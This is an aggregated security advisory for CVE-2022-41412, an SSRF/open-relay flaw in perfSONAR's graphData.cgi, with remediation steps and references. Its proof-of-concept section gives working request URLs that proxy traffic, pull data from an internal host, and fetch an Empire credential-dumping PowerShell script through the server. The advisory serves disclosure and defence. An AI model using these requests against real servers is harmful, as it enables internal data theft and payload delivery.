Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-41412: GitHub - renmizo/CVE-2022-41412

An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.

CVE
Open in Source
#vulnerability#web#google#git#ssrf#auth

Vendor: perfSONAR
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.4
Vulnerability Type: Open Proxy Relay
Vulnerability Family: CGI Abuses
Discovered by: Ryan Moore
CVE: CVE-2022-41412

Summary

perfSONAR bundles with it a graphData.cgi script, used to graph and visualize data. There is a flaw in graphData.cgi allowing for unauthenticated users to proxy and relay HTTP/HTTPS traffic through the perfSONAR server. The vulnerability can potentially be leveraged to exfiltrate or enumerate data from internal web servers.

This vulnerability was patched in perfSONAR v4.4.5.

There is a whitelisting function that will mitigate, but is disabled by default.

Proof of Concept****Examples

Here are three examples of this vulnerability in use. To pass a regex match, the URL must include /esmond/perfsonar/archive/…/…/…/ .

Example 1:

In this example, www.google.com is proxied through perfSONAR server.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=https://www.google.com/esmond/perfsonar/archive/…/…/…/&src=8.8.8.8&dest=8.8.4.4

Example 2:

In this example, sample data is exfiltrated from another adjacent internal web host, running an arbitrary port 4444.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://192.168.68.113:4444/esmond/perfsonar/archive/…/…/…/&src=8.8.8.8&dest=8.8.4.4

Example 3:

In this example, we are able to download a malicious Powershell script through the perfSONAR server.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=https://raw.githubusercontent.com/esmond/perfsonar/archive/…/…/…/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1&src=8.8.8.8&dest=8.8.4.4

Remediation

Enable whitelisting in perfSONAR.
Update perfSONAR to 4.4.5 or newer.

References

  • https://lists.internet2.edu/sympa/arc/perfsonar-user/2022-09/msg00030.html
  • https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb
  • https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41412

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE